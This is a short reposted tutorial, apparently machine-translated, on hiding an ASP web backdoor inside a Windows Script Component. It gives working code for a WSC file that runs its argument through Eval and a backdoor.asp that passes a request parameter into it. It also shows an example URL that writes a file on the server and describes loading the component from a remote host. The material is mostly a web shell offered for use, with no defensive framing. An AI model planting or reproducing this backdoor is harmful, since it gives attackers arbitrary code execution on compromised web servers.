Using WSC to make an ASP backdoor _vbs

Source: Internet
Author: User
<?xml version= "1.0" encoding= "gb2312" standalone= "yes"?>
<?component error= "true" debug= "true"?>
<package>
<component id= "Haiyangtop" >
<public>
<method name= "LCX" ><parameter name= "B"/></method>
</public>
<script language= "VBScript" ><! [cdata[
Sub Lcx (b)
Eval (b)
End Sub
]]>
</script>
</component>
</package>
Backdoor.asp contents are as follows:
<%
B=request ("a")
Set fs = GetObject ("Script:d:/web/scriptcodinginfo.wsc#haiyangtop")
FS.LCX (b)
%>
The method is invoked as follows: Http://url/backdoor.asp?a=CreateObject ("Scripting.FileSystemObject"). OpenTextFile ("C:\1122.txt"), 8,true,0). WriteLine ("123")
Note that the a= can only be a VBS code, can not accept such as response, rquest, such as the ASP Dongdong.
If a 2000 server can remotely call SCRIPTCODINGINFO.WSC in backdoor.asp, like
Set fs = GetObject ("Script:http://www.xx.com/scriptcodinginfo.wsc#haiyangtop"), not available in 2003 server.
Calculate a train of thought, chicken ribs, who has a better way to improve, can directly invoke the CS ASP Trojan's C-end is good.
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.